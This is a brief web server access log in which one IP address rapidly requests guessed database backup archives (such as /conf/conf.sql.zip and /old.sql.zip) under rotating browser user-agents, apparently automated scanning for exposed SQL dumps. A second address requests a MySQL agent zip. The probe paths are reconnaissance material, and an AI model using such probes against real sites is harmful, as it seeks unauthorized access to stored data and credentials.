154.12.251.68 - - [20/Mar/2024:14:59:02 +0000] "GET /upload.sql.zip HTTP/1.1" 301 4187 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:03 +0000] "GET /src.sql.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:03 +0000] "GET /conf/conf.sql.zip HTTP/1.1" 301 4193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36" 0 - 
154.12.251.68 - - [20/Mar/2024:14:59:03 +0000] "GET /old.sql.zip HTTP/1.1" 301 4181 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" 0 - 
185.220.101.30 - - [20/Mar/2024:22:09:27 +0000] "GET /mysql_agent/3176942/AdventNet_Micro_Agent_MySQL_1_0_1_Windows.zip HTTP/1.1" 301 4109 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 0 +